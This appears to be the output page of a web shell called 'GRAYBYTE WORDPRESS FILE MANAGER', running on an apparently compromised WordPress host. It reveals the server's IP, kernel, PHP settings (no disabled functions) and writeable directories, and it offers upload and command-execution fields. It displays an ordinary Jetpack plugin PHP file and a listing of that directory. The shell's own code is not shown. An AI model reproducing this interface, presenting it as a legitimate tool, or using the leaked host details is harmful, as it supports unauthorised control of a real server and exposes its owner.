GRAYBYTE WORDPRESS FILE MANAGER2457

Server IP : 162.213.255.40 / Your IP : 216.73.216.121
System : Linux server146.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
PHP Version : 8.0.30
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF

HOME

/home/hellrfbn/public_html/wp-content/plugins/jetpack/sal/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /home/hellrfbn/public_html/wp-content/plugins/jetpack/sal//class.json-api-platform.php
<?php  // phpcs:ignore WordPress.Files.FileName.InvalidClassFileName
/**
 * SAL_Platform class which defines a token to later be associated with a Jetpack site
 *
 * @package automattic/jetpack
 */

require_once __DIR__ . '/class.json-api-token.php';

/**
 * Base class for SAL_Platform
 */
abstract class SAL_Platform {
	/**
	 * A token that will represent a SAL_Token instance, default is empty.
	 *
	 * @var SAL_Token
	 */
	public $token;

	/**
	 * Contructs the SAL_Platform instance
	 *
	 * @param SAL_Token $token The variable which will store the SAL_Token instance.
	 */
	public function __construct( $token ) {
		if ( is_array( $token ) ) {
			$token = SAL_Token::from_rest_token( $token );
		} else {
			$token = SAL_Token::for_anonymous_user();
		}

		$this->token = $token;
	}

	/**
	 * This is the get_site function declaration, initially not implemented.
	 *
	 * @param int $blog_id The sites Jetpack blog ID.
	 * @see class.json-api-platform-jetpack.php for the implementation of this function.
	 */
	abstract public function get_site( $blog_id );
}

if ( defined( 'IS_WPCOM' ) && IS_WPCOM ) {
	require_once dirname( WP_CONTENT_DIR ) . '/public.api/rest/sal/class.json-api-platform-wpcom.php';
} else {
	require_once __DIR__ . '/class.json-api-platform-jetpack.php';
}

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
July 23 2025 07:38:28
hellrfbn / hellrfbn
0755
.htaccess
0.41 KB
July 23 2025 07:38:28
hellrfbn / hellrfbn
0644
class.json-api-date.php
2.491 KB
February 05 2025 15:45:00
hellrfbn / hellrfbn
0644
class.json-api-links.php
15.507 KB
February 05 2025 15:45:00
hellrfbn / hellrfbn
0644
class.json-api-metadata.php
2.126 KB
February 05 2025 15:45:00
hellrfbn / hellrfbn
0644
class.json-api-platform-jetpack.php
1.308 KB
February 05 2025 15:45:00
hellrfbn / hellrfbn
0644
class.json-api-platform.php
1.254 KB
February 05 2025 15:45:00
hellrfbn / hellrfbn
0644
class.json-api-post-base.php
31.188 KB
February 05 2025 15:45:00
hellrfbn / hellrfbn
0644
class.json-api-post-jetpack.php
2.167 KB
February 05 2025 15:45:00
hellrfbn / hellrfbn
0644
class.json-api-site-base.php
43.072 KB
February 05 2025 15:45:00
hellrfbn / hellrfbn
0644
class.json-api-site-jetpack-base.php
10.824 KB
February 05 2025 15:45:00
hellrfbn / hellrfbn
0644
class.json-api-site-jetpack.php
18.511 KB
February 05 2025 15:45:00
hellrfbn / hellrfbn
0644
class.json-api-token.php
3.644 KB
February 05 2025 15:45:00
hellrfbn / hellrfbn
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF